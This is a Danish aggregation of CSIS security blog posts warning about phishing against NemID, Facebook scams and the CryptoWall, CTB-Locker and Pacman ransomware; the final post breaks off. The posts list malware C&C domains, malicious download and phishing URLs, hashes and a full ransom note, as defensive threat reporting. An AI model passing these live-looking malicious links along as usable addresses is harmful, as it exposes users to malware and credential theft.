Quantcast
Channel: CSIS Security Group

CSIS Blog: Ny webside udstiller blottede webcams

0
0

Webcams var sidste år øverst på danskernes julegave liste. At mange af sådanne er installeret i danske hjem kan næppe overraske nogen, men desværre kan det overraske - på trods af talrige advarsler i pressen, hvor mange der blot pakker webcam'et ud og ukritisk installerer det. Det kan give andre samme adgang til at følge med i det private rum som indehaveren af webcam'et idet hovedparten leveres med fabriksindstillinger og et standard password.

Det faktum, at så mange webcams er åbne fra internettet, og kan tilgåes med standard passwords, dokumenteres nu af websiden: insecam.com.

599 webcams streames fra Danmark
på denne side kan man se en oversigt over "usikre" webcams i Danmark og samtidig følge med i begivenhederne live. I skrivende stund er der 599 webcams tilgængelige i Danmark. Åbenlyst er flere af disse ikke tilsigtet at skulle kunne tilgås og derved følge med i hvad der foregår i private hjem, skoler, kollegier, gymnastik haller osv. Vi har flere gange været ude og advare omkring dette.


Det er vigtigt at understrege, at det IKKE er lovligt at tilgå dette udstyr, også selvom det gør brug af standard/default brugernavn/password. At kunne logge ind på dette udstyr gør det ikke nødvendigvis lovligt. Vi overvejer om den pågældende webside, som gør disse streams tilgængelige, skal blokeres i CSIS Secure DNS.

Generelle råd når du køber og vil installere et webcam:
1) Læs manualen
2) Skift password
3) Sørg for at opdatere firmware/software løbende
4) Begræns adgang til udstyret fra internettet


CSIS Blog: Macaulay Culkin er IKKE død

0
0

Nej! Lad det være sagt med det samme: Macaulay Culkin er ikke fundet død. Der er tale om endnu en kendis dødshoax og folk som ønsker at tjene penge på den slags platte og uetiske stunts.

Nyheden om skuespillere, rockstjener og andre kendisser dødsfald er et super effektivt fluepapir. Men pas på. De mange falske nyheder kan føre naive brugere i hænderne på decideret malware. Ofte misbryges disse virale kampagner nemlig til at lokke folk til for derefter at forsøge at plante malware på systemet.

Den seneste bølge af påstande om et kendis dødsfald tilfalder Macaulay Culkin som nok mest er kendt fra filmene "Alene Hjemme". En klassiker ved juletid som også ofte sendes i dansk tv. Beskeden spredes igennem et opslag på Facebook:

Inden det kommer så vidt har ofret besøgt en webside som formentligt er oprettet specifikt til formålet:
http://msnbc.website/macaulay-culkin-found-dead-at-age-34.html

Indholdet af denne webside er vist herunder:

Formålet med denne webside er at lokke folk til at sprede den falske nyhed, hvorved kampagnen opnår en viral effelt. Det betyder også at personen bag denne webside og rygte tjener penger på de mange kliks som genereres, idet der også vises reklamer som ved kliks giver et kontant kickback.


<span class='st_facebook_hcount' displayText='Facebook'></span>
<span class='st_fblike_hcount' displayText='Facebook Like'></span>
<span class='st_fbsend_hcount' displayText='Facebook Send'></span>
<span class='st_twitter_hcount' displayText='Tweet'></span>
<span class='st_sharethis_hcount' displayText='ShareThis'></span>

Vi har blokeret websiden i CSIS Secure DNS, ligesom vi derved også beskytter Heimdal PRO og corporate kunder mod denne og tilsvarende kampagner.

CSIS Nyheder: Europol og CSIS formaliserer samarbejde

0
0

Det danske IT-sikkerhedsfirma CSIS har indgået en aftale med Europol EC3. Målet er, i fællesskab, at bekæmpe den voksende it-kriminalitet.

I et målrettet og europæisk samarbejde har Europol og CSIS underskrevet en strategisk samarbejdsaftale som i fremtiden skal øge indsatsen mod organiseret online kriminalitet.

Det styrkede og formaliserede samarbejde har bl.a. til formål at udveksle tekniske data som konkret skal føre til efterforskning og anholdelse af it-kriminelle.

Aftalen, som netop er indgået mellem Europol og CSIS, er et resultat af en øget opmærksomhed mod den voksende it-kriminalitet.

Med vores viden, som CSIS i den daglige efterforskning af bl.a. BOTnets, målrettede angreb og netbank tyve, kommer i besiddelse af, kan vores data nu deles med EC3 med henblik på international efterforskning.

"Det er vores mål løbende at fodre vores samarbejdspartner", EC3 med oplysninger som kan være relevante for en politi efterforskning, forklarer Peter Kruse som er stifter og daglig leder af CSIS’ særlige eCrime Unit. Han fortsætter: ”vi må erkende at efterforskning af it-kriminalitet er højt på agendaen i mange lande, men at det samtidig også er en tung og teknisk besværlig opgave at løfte. Løsningen er imidlertid at styrke informationsdelingen og samarbejdet mellem private og specialiserede sikkerhedsfirmaer som vores og internationalt politi. Den nye samarbejdsaftale er afgjort et skridt i den rigtige retning”.

EC3 blev etableret sidste år som en indsats mod cyber-kriminalitet, bekæmpelse af pædofilt materiale samt til beskyttelse af kritisk infrastruktur i EU.

En samlet og styrket indsats mod it-kriminalitet
"Det er vores opfattelse at EC3’s berettigelse, som omdrejningspunkt i efterforskning af it-kriminalitet, allerede har båret frugt med flere vellykkede operationer og anholdelser. Den tendens ser vi gerne fortsætter", forklarer Peter Kruse og uddyber ”når virksomheder og brugere i Danmark udsættes for it-kriminalitet, så peger sporene typisk ud af landet, hvorfor netop et formaliseret samarbejde med Europol giver god mening”.

Yderligere oplysninger om Europol/EC3:
https://www.europol.europa.eu/ec3

Yderligere oplysninger om CSIS:
https://www.csis.dk/da/csis/about/

CSIS Blog: Hurtigt spredende Facebook orm

0
0

Vi ser i disse timer mange rapporter omkring en ny "orm" som replikerer sig over Facebook.

Ormen, som inficerer via et link der peger på "Dropbox", sender sig selv videre som en besked til venner og bekendte og poster sig endvidere på ofrets væg med følgende indhold:

"%Navnet på offer%" Private Video [link til dropbox].
"%Navnet på offer%" OMG! [link]

Den tagger samtidig venner og bekendte, hvorved den opnår hurtig spredning.

Brugeren skal åbne og aktivere linket til dropbox for at blive inficeret. Ved infektion vil koden installere sig som en browser udvidelse.

Vi har endvidere set en tilsvarende kampagne som peger på skyen hos Amazon og som tilbyder et "New Emoticons!" udvidelse via:
hxxp://video5826.s3-website.eu-central-1.amazonaws.com/


Denne flytter trafikken videre til:
hxxp://free.motitags.com som tilbyder "Motitags toolbar".




Som det kan ses af ovenstående hentes pluginet fra:

Premium Codec
http://ajetem68.mzzhost.com/premiumD.xpi

Den pågældende udvidelse installeres som "Premium Code" og kan fjernes under udvidelser. Den understøtter Internet Explorer, Firefox og Chrome.

Facebook brugere som er inficeret kan genkendes ved at de poster beskeder med tags som eksempelt tidligere. Koden muterer løbende. Den seneste variant gør brug af URL-forkorter tjenesten goo.gl. Der genereres også løbende nye links og billede indhold.

Indholdet trækkes via en IRC server, som den inficerede maskine hiver nye instruktioner fra. Denne er blokeret i Heimdal PRO og CSIS Secure DNS ligesom vi har blokeret de websider som det skadelige indhold leveres igennem. Vi detekterer trafikken som "FBMotitags". Antivirus detektion er lav.

CSIS Blog: Pas på pakke fra FedEx

0
0

Juleferien er for alvor slut og flere af de større aktørerer er tilbage i fulde omdrejninger. Det ses bl.a. af formiddagens helt store spamkampagne, hvor i tusindvis af uønskede e-mails har ramt danske indbakker.

Der lokkes med information om en pakke fra FedEX, men klikker modtageren på linket, tilbydes en zip-fil fra en kompromitteret webserver.

En kopi af den uønskede e-mail er gengivet herunder:


Der er naturligvis tale om malware og mere speficikt en informationstyv i Andromeda familien, som systematisk høster data fra kompromitterede systemer. Den pågældende Andromeda variant kommunikerer tilbage til følgende C&C servere:

fudssufsd3.com
fuqwedsuffsd3.com
fusdsssufsd3.com
fudsussfdsd3.com

I skrivende stund er antivirus detektion lav (4 / 56):
https://www.virustotal.com/da/file/22e4246eac4ea4662a5434e4f0a06a2fc9232e6cc91ef03715bcf979090172a0/analysis/

CSIS Blog: Pas på ny phishing kampagne

0
0

En ny phishing kampagne som foregiver at komme fra Jyske Bank er i omløb og spammes ud mod vilkårlige danskere.

Som det fremgår af skærmdumpet, herunder peger linket i den pågældende e-mail IKKE på Jyske bank, men derimod på en kompromitteret webserver.


Et uforsigtigt klik på dette link sender ofret videre ind på en anden webside (meine-db-security.net).

I første fase lokkes ofret til at indtaste sit personlige NemID brugernavn og password.

I sidste fase af denne phishing kampagne skal ofret lokkes til at uploade foto/indscannet billede af selve NemID kortet.


Vi har tidligere advaret omkring dette og vil opfordre alle til at udvise stor forsigtighed med at udlevere private og følsomme data over Internettet og særligt hvis man ikke ved, eller er sikker på, hvem modtageren er, som i dette tilfælde. 

At der stadig er folk som hopper på disse phishing kampagner, med den betydelige konsekvens det kan have, illustreres af vores kort herunder. Kortet viser de IP adresser som har opgivet oplysninger til den forfalskede webside. Kortet kan ikke bruges til at afgøre om der er tale om legitime oplysninger eller om de IP som har besøgt siden har gjort det med henblik på at efterforske eller blot var nysgerrige:

Vi har allerede blokeret domænerne i Heimdal PRO og corporate og CSIS Secure DNS hvorved vi yder beskyttelse mod datalækage. Vi har samtidig initieret nedskydning af det ondsindede og uønskede indhold, som anvendes i denne phishing kampagne.

CSIS Blog: Advarsel mod uønsket Brainyvines App

0
0

CSIS har modtaget flere henvendelser fra vilkårlige danske Facebook brugere som oplever, at de via et Facebook opslag, er kommet til at installere en uønsket Facebook app med navnet "Newly Daily Entertainment". Den pågældende app vil opnå adgang til følgende Facebook områder knyttet til profilen: "offentlig profil", "venneliste" og "chatstatus". Den vil udnytte dette til at sprede sig yderligere, og lokke venner og bekendte til at installere denne app. Det skal man naturligvis ikke gøre men derimod slette disse opslag og hjælpe til at uddanne venner og bekendte så den slags i fremtiden får vanskeligere ved at sprede sig.

Den pågældende "Newly Daily Entertainment" app modtages igennem et opslag på Facebook, som deles offentligt:


Hvis en Facebook bruger ser dette, eller tilsvarende opslag, og lader sig friste til klikke på indholdet vil trafikken flyttes væk fra Facebook, og over på en ekstern webside:

news-fruitloopztopentertainments.com

Den webside flytter, via et script, brugeren videre til et domæne, som tydeligvius er oprettet af samme bagmænd:

news-festivalentertainment.com

Scriptet afslører diverse lokale server oplysninger:
/home/brainyvines/public_html/news-fruitloopztopentertainments.com/details.php

Herfra flyttes brugeren tilbage til Facebook, hvorfra man bliver tilbudt at acceptere den pågældende Facebook applikation:

Domænerne, som anvendes i denne kampagne, er registreret, så indehaverdata er beskyttet bag "whoisguard". Domænerne peger imidlertid begge på samme server: 198.44.66.98. Denne server deler andet indhold, som man sagtens vil kunne leve uden, og som faktisk kan bindes direkte til andre "Brainyvines" Facebook kampagner, herunder:

horryingvineshd.com
holidaybrainyvines.com
news-fruitloopsentertainment.com
news-fruitloopztopentertainments.com
tapbrainyvines.ninja

CSIS har blokeret de uønskede domæner i CSIS Heimdal PRO og corporate samt CSIS Secure DNS.

Vi har samtidig kontaktet Facebook og anmodet dem om at fjerne den pågældende applikation som spreder dette uønskede indhold.

CSIS Blog: CryptoWall rammer danske virksomheder

0
0

I kølvandet på flere incidents i danske virksomheder med "CTB-locker" byder dagen i dag på endnu en stribe infektioner, hvor værdifulde data krypteres og udsættes for løsesumskrav.

CSIS ønsker hermed at advare om flere aktive incidents som involverer kidnapningssoftwaren kendt som "Cryptowall" - mere specifikt version 3.0. Denne krypterer alle data på harddisken samt alle delte drev ved brug af RSA-2048, hvorefter den afpresser ofret for kontanter (virtuel valuta). Krypteringen, som er asymetrisk og kraftig, er yderst vanskelig, omend umulig at knække. Den bedste løsning er at reinstallere systemet og indlæse data fra backup og derefter tilsikre en højere grad af sikkerhed og awareness. Man skal ikke betale nogen løsesum.

Denne version af Cryptowall har introduceret brug af "i2p proxy" som kamouflerer trafikken og gør det betragteligt vanskeligere at spore infrasturen bag denne gruppe af it-kriminelle.

Den nye variant af Cryptowall taler udelukkende Engelsk, men betalingssiden understøtter følgende sprog:

US English
IT
FR
ES
DE

Skærmen som frembringes hos ofret indeholder følgende anvisninger:


CSIS Secure DNS og Heimdal PRO beskytter mod denne og ældre varianter af Cryptowall.

Vi har blokeret flere end 70 forskellige domæner som anvendes som C&C servere, og hvorfra den pågældende nøgle som anvendes til at kryptere data udstedes fra. Hvis kontakt til C&C serveren ikke kan etableres, fordi den blokeres i CSIS Secure DNS, afværges den del af funktionen som krypterer data og efterlader det til en simpel opgave at fjerne denne malware.

Et lille udsnit af Cryptowall domæner findes herunder (mellemrum indlagt af CSIS)

blessedcode.net:8080
fleep.com:8081
fleep.net:8081
amaru.me:8081
macrobiotics-japan.com:8081
naomis-kitchen.com:8081
fleep.jp:8081
lensprojapan.com:8081
aquionics.net:2525
tgp.com.my:2525
mlmsoftware.com.my:2525

Antivirus detektion af Crytowall og CTB-locker er desværre generelt yderst lav ved distribution.

Cryptowall kan kædes sammen med distribution af en anden malware, som er kendt som "Dyreza". Dette er en regulær informationstyv som høster data fra systemer som den kompromitterer. Samme fremgangsmetode, at anvende en Dyreza infektion for dernæst at installere en "CryptoWall", er tidligere observeret i forbindelse med ZeuS Gameover og Cryptolocker banden.

Vi følger denne udvikling tæt og anbefaler alle vores kunder at tilsikre gode backup procedurer og incident response.


CSIS Blog: Cryptowall i ny spamkampagne

0
0

Flere danske kommuner blev i denne uge ramt af Cryptowall, som er et stykke væmmeligt kidnapningssoftware (ransomware) der systematisk gennemsøger alle datafiler (dokumenter, billeder, databaser m.v.) lokalt og på alle tilgængelige fællesdrev/shares, og krypterer disse med en unik nøgle baseret på algoritmen RSA2048.

Allerede i går eftermiddag advarede CSIS så igen vores kunder om at en ny spamkampagne er skudt i gang.

Den nye kampagne startede kl. 16.10 i går (torsdag) og ankommer med et letgenkendeligt indhold (se skærmdump herunder)
.
Den medfølgende zip fil, som indeholder en binær fil, vil ved kørsel kopiere sig til harddisken i mappen: 
"[%brugerprofil%]Application Data[vilkårligt filnavn].exe" samt en sekundær kode som kopieres ind i startmappen.


Filnavn: VOICE8419-283-481.scr
MD5:  5dd9b1d1fa4f48d440b19b6be04de03d
Størrelse: 311.296KB

I næste fase kontaktes en stribe domæner, som allerede er blokeret i CSIS Secure DNS og Heimdal PRO/Corporate, hvor den laver et post request som vist herunder:

[domæne]:8585/5x0mi[fjernet af CSIS]

I kommunikationen med C&C serveren anvendes følgende API'er:

HttpSendRequestExA.WININET
InternetWriteFile.WININET
HttpEndRequestA.WININET

Når nøglen er genereret fra C&C serveren, så kopieres følgende fil til samtlige tilgængelige drev "HELP_DECRYPT.HTML" mens kryptering af datafiler igangsættes. Det sker ved at den injektes i svchost.exe processen på værtsmaskinen. Processen sættes i dvale i 3 minutter via sleep kaldet "Thread delayed: delay time: -900000".

En stribe andre interessante funktioner omfatter bl.a.:

- Sletter windows event logs 
- Fjerner applikationsfejl via SetErrorMode
- Lytter på vilkårlig TCP port formentlig med bagdørsfunktionalitet

Den pågældende krypteringsnøgle skabes på baggrund af data der indsamles fra den kompromitterede maskine baseret på henholdsvis:

- timeGetSystemTime
- cpuid 
- HKEY_LOCAL_MACHINESOFTWAREMicrosoftCryptography MachineGui
- C: VolumeInformation

Cryptowall binder maskinen ind i et BOTnet, som registrerer infektionen og danner en unik krypteringsnøgle der anvendes til at kryptere data på maskinen og alle tilgængelige delte drev/mapper. 

Krypteringen er så kraftig, at reetablering af data stort set er umulig. Af samme grund opfordrer vi indtrængende alle til at sikre, at der er forsvarlig backup og incident response procedurer på plads.

Vi vurderer denne trussel som høj, idet kørsel af koden af en uforsigtig modtager, kan føre til alvorlige og uoprettelige skader såfremt der ikke er etableret en backup procedure.

Antivirus detektion giver (4 / 57):

CMC     Trojan.Win32.Krap.2!O     20150120
Kaspersky     UDS:DangerousObject.Multi.Generic     20150122
Sophos     Mal/Generic-S     20150122
Tencent     Win32.Trojan.Inject.Auto     20150122
ALYac         20150122
AVG         20150122
AVware         20150122
Ad-Aware         20150122
AegisLab         20150122
Agnitum         20150122
AhnLab-V3         20150122
Alibaba         20150120
Antiy-AVL         20150122
Avast         20150122
Avira         20150122
Baidu-International         20150122
BitDefender         20150122
Bkav         20150122
ByteHero         20150122
CAT-QuickHeal         20150122
ClamAV         20150122
Comodo         20150122
Cyren         20150122
DrWeb         20150122
ESET-NOD32         20150122
Emsisoft         20150122
F-Prot         20150122
F-Secure         20150122
Fortinet         20150121
GData         20150122
Ikarus         20150122
Jiangmin         20150121
K7AntiVirus         20150122
K7GW         20150122
Kingsoft         20150122
Malwarebytes         20150122
McAfee         20150122
McAfee-GW-Edition         20150122
MicroWorld-eScan         20150122
Microsoft         20150122
NANO-Antivirus         20150122
Norman         20150122
Panda         20150122
Qihoo-360         20150122
Rising         20150121
SUPERAntiSpyware         20150122
Symantec         20150122
TheHacker         20150121
TotalDefense         20150122
TrendMicro         20150122
TrendMicro-HouseCall         20150122
VBA32         20150122
VIPRE         20150122
ViRobot         20150122
Zillya         20150121
Zoner         20150121
nProtect         20150122

Yderligere oplysninger om Cryptowall:
http://www.csis.dk/da/csis/blog/4576/

CSIS Blog: Giv agt: CTB-locker spammes ud

0
0

Vi har tidligere i dag udsendt en "First Strike" advarsel til vores "platinium alert" kunder (for mere information om "Platinum alert henvises tIl: https://www.csis.dk/da/business/pas/). Et udsnit af den advarsel, som vi tidligere har udsendt findes herunder:

Vi ser her til eftermiddag et nyt "CTB-Locker" spamrun, som rammer vilkårlige indbakker:

Den ankommer som en e-mail med en vedhæftet cab-fil som indeholder en .scr fil.

Hvis cab-filen åbnes (som faktisk er en zip), og den uønskede kode køres, af en uforsigtig modtager, så krypteres indhold på harddisken og samtlige delte drev ved brug af en kraftig krypteringsnøgle. 

CSIS har blokeret alle domæner i CSIS Secure DNS, som denne malware anvender i sin kommunikation, og som den bruger til at binde kidnappede maskiner ind i dens BOTnet.

Et skærmdump af den uønskede e-mail findes herunder:


Hvis den vedhæftede fil åbnes, vil koden kopiere sig til den lokale harddisk. Filerne kopieres dernæst til den aktive brugerkonto (kernel userland) og den temporære mappe som dels en [vilkårligt filnavn.rft] og [vilkårligt filnavn.exe]. Den binære fil er en kopi af den skadelige kode, mens rtf-filen er en "decoy" som skal forvirre brugeren til at tro at intet er sket. Det sker ved at åbne dokumentet i WordPad eller Word (afhængig af hvilke indstillinger som er angivet til at håndtere rtf filer):


Inden koden optager/igangsætter dens skadelige funktionalitet, hvor den påbegynder krypteringen af tilgængelie data, gør den brug af en "sleep" funktion. Denne er identisk med Cryptowall: "Thread delayed: delay time: -300000" (ca. 3 minutter).

I næste fase igangsættes selve krypteringen af data og følgende "vejledning" til at befri data kopieres til samtlige mapper, hvor data er blevet kidnappet:

Your documents, photos, databases and other important files have been encrypted
with strongest encryption and unique key, generated for this computer.

Private decryption key is stored on a secret Internet server and nobody can
decrypt your files until you pay and obtain the private key.

If you see the main locker window, follow the instructions on the locker.
Overwise, it's seems that you or your antivirus deleted the locker program.
Now you have the last chance to decrypt your files.

Open http://w7yue5dc5amppggs.onion.cab or http://w7yue5dc5amppggs.tor2web.org
in your browser. They are public gates to the secret server.

If you have problems with gates, use direct connection:

1. Download Tor Browser from http://torproject.org

2. In the Tor Browser open the http://w7yue5dc5amppggs.onion/
Note that this server is available via Tor Browser only.
Retry in 1 hour if site is not reachable.

Copy and paste the following public key in the input form on server. Avoid missprints.
YOPLXBG-[fjernet af CSIS]-JITHH75-3WTMQ3J-FSQHUAL-6DTGEM6-FTWFJSQ-UVEKYHF
FS6OJJS-[fjernet af CSIS]-YQZDOMZ-D7XVC2Q-MWP3ZB3-NB4EXTU-GAM4HSG-GRJENDN
ST4GXUX-[fjernet af CSIS]-ZSPJUPX-WIHEGMR-ERKGTDE-EPZKPX3-TNIKWV3-Q73X2OI

Follow the instructions on the server.

Det samme budskab droppes også som bmp filer med filnavnet: "Decrypt-All-Files-[filnavn].bmp

Og som grande finale afsluttes med en advarselskærm som gengivet herunder:


Koden injekter sig i flere legitime processer, herunder svchost.exe og forbinder sig til dens C&C servere, hvor den afleverer oplysninger om det inficerede system. Som tidligere nævnt beskytter CSIS imod dette ved at blokere for domænerne i CSIS Secure DNS og Heimdal Pro/corporate.  

Antivirus detektion giver i skrivende stund (1/57):
https://www.virustotal.com/da/file/6a94a4a1e154a240d6803bed560b35f750b9398105e4f69537ba7a7359b27110/analysis/

CSIS Nyheder: CSIS’ name abused in malicious spam campaign

0
0

Dear Madam/Sir,

Please accept our apologies if you have received an email like the one shown below. These are NOT coming from CSIS. They carry a malicious attachment and should therefore be disregarded and deleted.

Attention CSIS

Currently, we are still investigating this spam campaign and will return with further information.

Best regards,

CSIS Security Group

CSIS Blog: Kidnapningssoftware er tilbage

0
0

CSIS har her til morgen observeret flere nye aggressive spammail kampagner som målrettet forsøger at levere kidnapningssoftware i "Cryptowall" klassen. En af de mest dominante og sendt ud til mange vilkårlige danske e-mail adresser foregiver at være en regning skrevet på tysk. Den ankommer med emnelinjen: "RechnungOnline Monat Februar 2015 (Buchungskonto: 7818210382" (se skærmdump herunder).


Den uønskede e-mail forsøger at lokke modtageren til at klikke på det medfølgende link. I den pågældende kampagne peges der på flere kompromitterede domæner.

Antivirus detektion er i skrivende stund lav men vi har blokeret flere end 10 domæner alene i dag som er involveret i disse kampagner i CSIS Secure DNS.

Den bedste beskyttelse er naturligvis at bortfiltre disse uønskede e-mails på gateway niveau eller som minimum blokere for de domæner hvor koden hentes og installeres. Et andet og godt råd er at tilsikre at forsvarlige backup procedurer er på plads og at den enkelte bruger kun har netværksadgange som er nødvendige for at udføre sit arbejde.

CSIS Blog: Phishing af Neteller konti

0
0

IT-kriminelle har i dag udsendt en større bølge af phishing mails som forsøger at fiske brugernavn og password til Neteller. Det sker igennem en klassisk phishing e-mail som ankommer med følgende indhold:


Hvis den vedhæftede html fil åbnes frembringes indhold som lokker brugeren til at opgive brugernavn og password.


De fiskede oplysninger sendes via en PHP gateway til bagmanden:
http://sununionforum.tk/emsg1.php

CSIS har blokeret det pågældende domæne i CSIS Secure DNS og Heimdal PRO. Vi anbefaler generelt, at man udviser forsigtighed med e-mails, som opfordrer til at videregive private oplysninger.

CSIS Blog: Nordea varemærke misbruges i ny phishing kampagne

0
0

En større phishing kampagne rettet mod NemID er blevet skudt i gang. Kampagnen forsøger at lokke naive brugere til at uploade en kopi af deres NemID kort samt fiske deres brugernavn og password. Det er indlysende hvilke konsekvenser det kan have.

Den uønskede e-mail ankommer med følgende indhold:  


Indholdet, som er skrevet på næsten fejlfrit dansk (dog med visse passager, som burde vække mistanke), inkluderer også et link til flere kompromitterede websider. Flere er disse har vi allerede fået suspnderet.

Hvis ofret kan lokkes til at klikke på det medfølgende link lander man på en forfalsket udgave af Nordea's webside (se skærmdump herunder). Som det fremgår er der inkluderet en fil-upload funktion hvor billed af sit NemID kort kan uploades.


Vi har allerede blokeret flere af disse forfalskede websider i CSIS Secure DNS for at beskytte vores kunder mod datalækage. Endvidere yder vi beskyttelse igennem Heimdal PRO og corporate.

CSIS Blog: Harpun phishing mod NemID brugere

0
0

En ny snedig phishing kampagne, som skal fiske NemID logins og kort, indeholder sammenkørte private data på ofret. Det kan medvirke til at skabe en høj grad af troværdighed. Det er første gang at vi har observeret, at svindlerne bag disse phishing kampagner målrettet skyder efter udvalgte ofre, og tilmed inkluderer flere personlige oplysninger i den uønskede e-mail.

En gruppe svindlere har i løbet af de seneste dage udsendt en begrænset mængde phishing mails med målet at lokke modtageren til at videregive følsomme private oplysninger, herunder et billede af det personlige NemID kort. Denne kampagne adskiller sig ved at være langt bedre udformet og mere målrettet end tidligere phishing kampagner.

Harpun phishing
Den nye kampagne har fået påført et tykt lag social engineering der opgraderer svindlen til det som vi i sikkerhedsbranchen kalder et harpun-angreb.

Et skærmdump findes herunder:


Ser vi nærmere på denne e-mail, så fremgår det tydeligt at de kriminelle på en række områder har forfinet deres teknik ved at tilføje personlige oplysninger:


Det skræmmende er, at de tilføjede private oplysninger, herunder de fire cifre i kreditkort nummeret som vist i ovenstående skærmdump, er korrekte og matcher ofrets kortoplysninger.

Vi har tidlige, som led i en række generelle råd anbefalet, at hvis den pågældende e-mail som modtages, er uden navn og andre person specifikke oplysninger - eksempelvis: "Kære NemID kunde" - så er der stor sandsynlighed for at det er svindel, idet vi antager at afsenderen bør kende modtagerens navn. Den spilleregel er med denne nye kampagne blevet ændret.

Samkørsel af data
Af indtil videre ukendte metoder er det lykkedes svindlerne at tilegne sig muligheden for at samkøre navn, mailadresse, korttype og de fire sidste cifre i kortnummeret og inkludere disse i den e-mail som sendes til modtageren. Det tyder på en kompromitteret webshop der har haft disse informationer liggende, men det er på nuværende tidspunkt spekulation.

CSIS anbefaler, at man følger vores generelle råd omkring sikker e-mail håndtering og phishing:
https://www.csis.dk/da/csis/news/3619/

Vi nar naturligvis blokeret de uønskede domæner i CSIS Secure DNS og Heimdal PRO/Corporate.


CSIS Blog: Hvem kigger på din Facebook profil?

0
0

Det helt simple svar på overskriften er, at det ved vi ikke og det kommer du heller ikke til at vide uanset hvor meget du "synes godt om" denne type fup kampagner,. I modsætning til andre sociale netværk som f.eks. LinkedIn kan man på Facebook ikke se, hvem der besøger ens profil, så når endnu en af disse "likejacking" kampagner cirkulerer igen, må det være fordi at budskabet fra tidligere ikke helt er trængt igennem? Vi prøver derfor igen ...

Når en besked pludselig fremkommer med indholdet: "[NY 2015!] SE, HVEM DER SER DIN FACEBOOK-PROFIL!" så skal man holde sig fra at klikke på indholdet. I stedet bør man fortælle sine venner og bekendte om at man ikke kan se den slags. Ej, heller med smarte apps, som samtidig leverer en sværm af reklamer til ens Facebook konto, mens den samtidig forsøger at indrulle ofret i en konkurrence karusel.

Kampagnen leveres via en post på ofrets Facebook profil. Denne deles med venner og bekendte og med et link til URL-forkorter tjenesten "bitly.com".


Trafik-kæden er gengivet herunder:

http://bitly.com/18z7ceQ
--> http://dk.de3.co/e/danska/
--> http://you.likethis.website/danska/
--> https://www.facebook.com/sharer/sharer.php?u=
--> http://danska.sharelike.pw

Så hvis man vælger at "synes godt om denne side", så deler man den samtidig med venner og bekendte via "danska.sharelike.pw". Kampagnen er sprog tilrettet og leveres i flere forskellige afskygninger, herunder flere sprog i Skandinavien og resten af Europa.

Vi har blokeret flere domæner i CSIS Secure DNS og Heimdal PRO/corporate som forhindre ofret i at besøge det uønskede indhold. Vi har kategoriseret dette som "scam/spam".

CSIS Nyheder: Spear phishing angreb mod danske kiropraktorer

0
0

CSIS har fået kendskab til en spear phishing kampagne rettet mod danske kiropraktorer. Angrebet er blevet udført ved at sende en særligt udformet e-mail, på fejlfrit dansk, til nøje udvalgte mål. Se kopi af e-mailen herunder:


Bemærk, at e-mailen er designet med en høj grad af social engineering som skal lokke netop denne målgruppe til at klikke på det medfølgende link. Samtidig bærer indeholdet tydeligt præg af, at dette kan være skrevet af en dansker.

Vi har valgt at kategorisere dette som en "høj" risiko, også selvom der er tale om et målrettet angreb. Det skyldes dels den grad af social engineering som er lagt i angrebet og dels den destruktive kode som forsøges plantet på ofrets maskine. Denne type angreb vil sandsynligvis være vellykket mod mange andre brancher i Danmark og kan derfor være en trussel for de fleste virksomheder og offentlige myndigheder.

"Pacman ransomware"
Med den uønskede e-mail følger et link til dropbox som tilbyder en ny ransomware variant som forfatteren til koden har døbt "ransomware-Pacman". Det fremgår af kompileringsresten i den binære kode: "L:x00[ransomware]PacmanPacmanobjx86ReleasePacman.pdb".

Koden er "binded" og består af flere lag som skal gøre det mere besværligt at analysere og detektere det skadelige indhold.

Hovedkomponenten kan nemt udtrækkes af "klatkagen" og hedder ikke overraskende "pacman.exe". Også af filegenskaberne afspejles det, at "Pacman" er navnet som forfatteren ønsker vi skal kende:

0000350C  Pacman.exe
0000352A  LegalCopyright
00003548  Copyright
0000355E    2014
00003572  LegalTrademarks
00003594  Pacman Tour
000035B2  OriginalFilename
000035D4  Pacman.exe
000035F2  ProductName
0000360C  Pacman Tour

Koden er udviklet i .NET og kræver således en fortolker for at kunne køre. Det har imidlertid langt de fleste Microsoft Windows installationer i dag.

Ved kørsel vil den kopiere sig til systemet via "NtCreateFile":

C:DOCUME~1[%brugerkonto%]LOCALS~1Tempimg_5672.exe.config
C:DOCUME~1[%brugerkonto%]LOCALS~1Tempimg_5672.exe

Herfra udtrækkes "pacman.exe" og droppes til windows mappen samtidig med at kryptering af filer på den lokale harddisk igangsættes. Koden gennemsøger i den sammenhæng disken for data filer og krypterer disse, mens den tilføjer en ny filendelse: ".ENCRYPTED". I direkte forlængelse af denne process ændres skrivebordet på den inficerede maskine og erstattes med instruktioner omkring hvordan man opnår adgang til sine data igen. Det er en typisk ransomware strategi. Et skærmdump af trusle, som den fremkommer hos ofret, kan ses herunder:


Betaling af løsesummen skal ske ved brug af Bitcoins og indenfor 24 timer.

Udover at indeholde ransomware funktionalitet, bærer koden også en keylogger som systematisk optager tastetryk og sender disse til bagmanden.

Når et system kompromitteres, igennem dette angreb, vil det ringe hjem til den centrale C&C server via følgende gateways (saniteret af CSIS)

http://myplacehome[.]comuv.com/crypted.php
http://myplacehome[.]comuv.com/locked.php

Vi har blokeret dette domæne i CSIS Secure DNS og Heimdal PRO/Corporate for at forhindre datalækage.

Som led i dens ondsindede funktioner gennemfører koden også løbende en "killprocess" af følgende legitime system værktøjer:

taskmgr
cmd
regedit
msconfig
sdclt
rstrui
powershell

Det kan indlysende nok besværliggøre fjernelse af "pacman" fra et inficeret system.

Hovedkomponenten opnår følgende antivirus detektion (20 / 57 ):
https://www.virustotal.com/en/file/68931ef9cf810d5a69d8ebf33155db7845fffcc685b1ae9f0670803bb97228cc/analysis/

CSIS ønsker at takke Jens Roed Andersen for at inddrage os i dette arbejde samt Max Sand fra Midtvest-it for at sikre os en kopi af koden.

CSIS Blog: Sexortion værktøj spredes på Facebook

0
0

Et ondsindet fjernbetjeningsværtøj, som ser ud til at være designet til at gennemføre videooptagelser af naive ofre, spredes i disse timer blandt danske Facebook brugere. Lokkemaden er hardcore pornografisk materiale og med den skadelige pakke kommer et plugin som tagger venner og bekendte og derved giver koden en viral effekt.

Hvis du pludseligt bliver tagget i indhold af yderst pornografisk karakter på Facebook er der stor sandsynlighed for at en ven eller bekendt har åbnet og aktiveret en ondsindet kode som bærer en cocktail af dårligdom. Koden som leveres bruges til at sprede det uønskede budskab videre til andre, men samtidig stjæler den også data fra din maskine og aktiverer bl.a. dit webcam.  

Infektionen starter med at du tagges i et opslag. Se eksempel herunder:


